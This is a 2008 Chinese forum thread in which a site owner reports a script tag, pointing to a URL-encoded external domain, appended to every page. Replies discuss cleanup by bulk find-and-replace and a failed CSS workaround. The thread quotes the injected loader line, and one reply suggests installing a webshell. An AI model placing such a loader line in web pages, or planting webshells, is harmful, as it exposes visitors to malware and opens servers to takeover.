所有网页文件最后加了一个js代码，中招了，晕呀

yzwt2004 发布于 2008-05-11 16:24， 889 次点击

所有页面最后都加了一个
<script src=http://%76%63%63%64%2E%63%6E></script>
这是什么毒呀，谁有专杀工具？我前些天清理掉，今天又有呀，完了，有什么法子呀，服务器自己的，就放了一个网站

7 回复

tianyu1232008-05-11 17:29

你的网站被挂马了

网站存在漏洞所至,删除了代码治标不治本，关键是要找到它入侵的真正原因才能根除。

szlxz20082008-05-15 14:14

这个得顶上来我也正在解决这问题
script{noj4s:expression(if(this.src.indexOf('http')==0)this.src='res://ieframe.dll/dnserror.htm');}
大家看这段能不能把含有HTTP的替换为本地400文件

szlxz20082008-05-15 14:15

原理：将外域的JS文件的src重写成本地IE404错误页面的地址，这样，外域的JS代码不会下载。但我测试不行，有高手看看哪有问题

makebest2008-05-15 16:20

一个小建议：在排除了作怪的程序后，可以用 Editplus 编辑器解决：
先用搜索功能查出所有这些ASP文件，然后点鼠标右键选Editplus可以全部打开，用替换的方法删除，它有一个选项：所有打开的文件，勾选即可，替换完成后选择菜单里的全部保存，全部关闭

zhuzhanjun2008-05-16 10:32

我的网站也被挂了。。哎~~~都不知道怎么删除。太烦人了

lele20072008-05-16 11:21

网上查的方法：http://www.
不知道有没有帮助！！

ilovey42008-05-17 02:57

呵呵一个最简单的办法
自己在自己网站上挂个webshell里面有个功能"批量清除木马"
清完之后检查下自己网站的漏洞
一般都是注入漏洞或者是管理员帐户那里存在的还有上传漏洞
注意下就行了